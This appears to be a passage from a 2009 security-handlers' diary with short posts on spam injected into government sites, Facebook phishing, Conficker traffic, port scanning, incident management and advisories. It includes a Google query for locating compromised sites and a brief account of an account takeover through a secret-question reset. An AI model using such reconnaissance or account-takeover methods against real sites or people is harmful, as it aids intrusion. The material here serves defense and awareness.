And let's not forget our fine government.  Nothing makes a taxpayer more proud than to know that their government websites are flogging fixes for flagging phalluses (ain't the alliteration sweet?).  Head back to Google and search for: "site:.gov filetype:html order viagra online"

Let's see... who do we have here?

  • The City of Ingleside, Texas (and they say Virginia is for lovers...)
  • The Oklahoma House of Representatives (still not Virginia...)
  • Yadkin County, North Carolina (oh... really, REALLY close...)
  • The New Hampshire Police Standards & Training Council (hehehehe...)

So, if any of you happen to have some free time on your hands, give those Google queries a shot.  Play around with different combinations of words and different combinations of search constraints. Drop a nice, polite note to the folks in charge of the compromised sites and point out the issues... but don't be surprised if they get a bit ticked off at you: there is a long, time-honored tradition in the IT world of blaming the messenger...

So what's the deal here?  While I haven't had (and don't have) the time to do an in-depth investigation, my guess would be that these are a result of having a Content Management System (CMS) get "managed" by someone else, either through a weak password or through a vulnerability in the CMS itself (these things are notoriously buggy...) Generally these "additions" are housed in a <span> marked with "visibility:hidden," and so a cursory glance at the site shows nothing amiss.  If no one bothers to look at the actual code of the page, the altered pages can hang around forever-- making your university, unit of government, or business look pretty darned silly.


Tom Liston - InGuardians, Inc. -Handler on Duty


Published: 2009-05-04

Facebook phishing malware

Looks like there may be a piece of malware out there is sending out messages to folks on Facebook trying to trick them into visiting a facsimile "Facebook" login page to steal credentials.  The phishing site is currently on "junglemix.in," so you may want to block that site.  More details as we figure this thing out. (Thanks to Kent for the heads up!)


Published: 2009-05-02

More Swine/Mexican/H1N1 related domains

Just a reminder to be ever vigilant in your browsing for Swine/Mexican/H1N1 flu information.  We show over 1000 new domains containing those keywords registered in the last 24 hours.


-- Rick Wanner - rwanner at isc dot sans dot org


Published: 2009-05-02

Decrease in Conficker P2P?

Seems to be my day to ask for assistance...

One of our regular contributers has been tracking Conficker related P2P traffic for the last several weeks.  Oddly, from their point of view the traffic dropped off to near nothing around  8 PM GMT on April 30th.

We have not heard of any change in Conficker behavior from any of the usual Conficker sources.  If any of you noticed any Conficker related changes in the last few days we would love to hear from you.


-- Rick Wanner rwanner at isc dot sans dot org


Published: 2009-05-02

Significant increase in port 2967 traffic

Today one of our Handlers notice an interesting anomaly in the Dshield data. Since late March Dshield has seen a significant increase in the number of sources using port 2967 for scanning.  Traditionally there has been some  activity on this port, but in late March  the number of sources increased approximately six times and the number of targets increased by about 50%. After a few days the sources settled  down to about double the traditional value.


Most likely this has something to do with the recent Symantec vulnerabilities, but we here at the ISC would be interested in any insight anybody can shed on this activity.  We would be especially interested in  packet captures from traffic of this nature.

 If you have any information that may help, please contact us.

-- Rick Wanner rwanner at isc dot sans dot org


Published: 2009-05-01

Password != secure

Reading a story on how an attacker broke into the administrative interface to twitter was the following quote: "One of the admins has a yahoo account, i've reset the password by answering to the secret question. Then, in the mailbox, i have found her twitter password." Social engineering and good guessing trumps security every time. Twitter have confirmed the intrusion, so sad but true. No hacking necessary. I could probably rant for hours on the subject, but most of you know the story. Enough said.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-01

Incident Management

Continuing on the discussion started here regarding Incident Response and Incident Handling, let's now introduce Incident Management. One of the issues we face in IT security is that we do not always use a common set of definitions or terminologies, so I find explaining what I mean is helpful when I say Incident Management, which may be different from what others understand. Looking at a couple of industry definitions we can see that they differ somewhat, but have common themes.

From ITIL: The objective of Incident Management is to restore normal operations as quickly as possible with the least possible impact on either the business or the user, at a cost-effective price.

From SEI: An incident management capability is instantiated in a set of services considered essential to protecting, defending, and sustaining an organization’s computing environment, in addition to conducting appropriate response actions.

From ISO/IEC 27002: Information security incident management - anticipating and responding appropriately to information security breaches.

From US-CERT: An incident management capability is the ability to provide management of computer security events and incidents. It implies end-to-end management for controlling or directing how security events and incidents should be handled. This involves defining a process to follow with supporting policies and procedures in place, assigning roles and responsibilities, having appropriate equipment, infrastructure, tools, and supporting materials ready, and having qualified staff identified and trained to perform the work in a consistent, high-quality, and repeatable way.

The definitions I work from are as follows:

Incident Response is all of the technical components required in order to identify, analyze, and contain an incident.

Incident Handling is the logistics, communications, coordination, and planning functions needed in order to resolve an incident in a calm and efficient manner.

One definition is more related to tactical, the other operational. Response focuses on the immediate needs of incident at hand; Handling on the broader capabilities of an organization to prepare for an incident.

Incident Management is the framework and set of functions required to enable Incident Response and Incident Handling within an organization.

Information Security Incident Management (IM) is not composed of a single process, but rather includes a number of operational and technical components which provide the necessary functions in order to support the traditional “Preparation, Identification, Contain, Eradication, Recovery, Lessons Learned” incident process model, including longer term monitoring, strategic planning, and trend analysis.

I helped develop an Incident Management Maturity Model (IM-MM) which included the following domains:

  • Threat Environment Monitoring
  • Security Incident Monitoring
  • Vulnerability Management
  • Configuration Management
  • Log Management
  • Forensics:
  • Incident Handling
  • Co-ordination/Centralization
  • Knowledge Management

People, policy, processes, and technology in each of these domains are required to varying degrees for an organizational Incident Management capability to function correctly. Each can also be evaluated for an assessment of the organization's overall capability to resolve incidents. 

Adrien de Beaupré, yes I do hold the GCIH certification, analyst #69. And yes, I have worked in Incident Response, Incident Handling, and Incident Management for quite some time. 

Adrien de Beaupré
Intru-shun.ca Inc.

The IM-MM has been released under a Creative Commons license, but not published as of yet, working on it now. Disclaimer, I am not an employee of SANS nor GIAC, and do not represent them. My opinions are my own and not my employer's nor anyone else's. And yes, I am Canadian eh!


Published: 2009-05-01

OpenBSD 4.5

OpenBSD 4.5 has been released. There are a few security and reliability fixes, including OpenSSH 5.2.


Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-01

Adobe Flash Media Server privilege escalation security bulletin

From their web site: A potential vulnerability has been identified in Flash Media Server 3.5.1 and earlier that could allow an attacker to execute remote procedures in Flash Media Interactive Server or Flash Media Streaming Server. Adobe recommends users update to the most current version of Flash Media Server (3.5.2 or 3.0.4 or greater)

Updates available to address Flash Media Server privilege escalation issue

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-01

Odd packets

No.           Time             Source                 Destination         Protocol Info
107496   10.768466         UDP Source port: 43152  Destination port: http

Frame 107496 (118 bytes on wire, 118 bytes captured)
Ethernet II, Src: Cisco (MACSRC), Dst: Cisco (MACDST)
Internet Protocol, Src: my-net (, Dst: apnic (
User Datagram Protocol, Src Port: 43152 (43152), Dst Port: http (80)
Data (76 bytes)
0030  01 00 8f f9 08 00 61 62 63 64 65 66 67 68 69 6a   ......abcdefghij
0040  6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 61 62 63   klmnopqrstuvwabc
0050  64 65 66 67 68 69 00 00 00 00 00 00 00 00 00 00   defghi..........
0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0070  00 00 00 00 00 00   

A few things to note, these are UDP packets from a high src port to port 80. They are coming from an 'our' network and going to a system in APNIC. There are a significant number of them.

Any ideas? Let us know.     

Adrien de Beaupré
Intru-shun.ca Inc.